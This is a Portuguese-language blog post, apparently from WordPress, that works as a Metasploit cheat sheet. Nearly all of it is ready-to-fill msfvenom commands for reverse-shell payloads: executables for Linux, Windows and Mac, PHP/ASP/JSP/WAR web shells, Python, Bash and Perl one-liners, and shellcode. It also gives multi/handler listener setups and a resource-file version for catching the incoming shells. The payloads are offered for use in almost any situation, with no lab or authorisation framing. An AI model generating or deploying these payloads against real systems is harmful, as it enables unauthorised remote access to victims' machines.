CREATING METASPLOIT PAYLOADS

Criando Payloads Metasploit
hack-like-pro-change-signature-metasploit-payloads-evade-antivirus-detection.1280x600.jpg
Muitas vezes, um dos mais úteis (e para o iniciante subestimado) habilidades de Metasploit é o módulo msfpayload. Várias Payloads podem ser criados com este módulo e ajuda algo que pode dar-lhe uma Shell em quase qualquer situação. Para cada uma destes Payloads que você pode entrar no msfconsole e selecionar exploit/multi/handler. Roda ‘set payload’ para a o payload, utilizado e configurar todas as opções necessárias (LHOST, LPORT, etc). Executar e aguarde o payload para ser executado. Para os exemplos abaixo que é bastante auto-explicativo, mas LHOST deve ser preenchido com o seu endereço IP (LAN IP  Se atacando esta dentro da rede, WAN IP se atacando externamente), e LPORT deve ser a porta que você deseja ser ligado novamente.
Lista de payloads
# msfvenom -l
Busca especificada
# msfvenom -l | grep windows | grep reverse_tcp_dns
Binarios
Linux
# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
# msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
PHP
# msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
ASP
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
# msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
# msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
# msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
Para todos shellcode ver ‘msfvenom -help-formatos’ para obter informações quanto aos parâmetros válidos. Msfvenom exporta o código de saída que pode ser recortado e colado para seu exploit.
Linux Based Shellcode
# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
# msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Metasploit handlers pode ser configurado rapidamente no Metasploit para receber as suas shell de entrada. O handlers devem estar no seguinte formato.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Handlers em Resource
Copie e cole e salve como resource.rc
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Use:
# msfconsole -r  resource.rc -q
-r leitura do resource.rc
-q Sem Banner msfconsole, Opcional

 

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s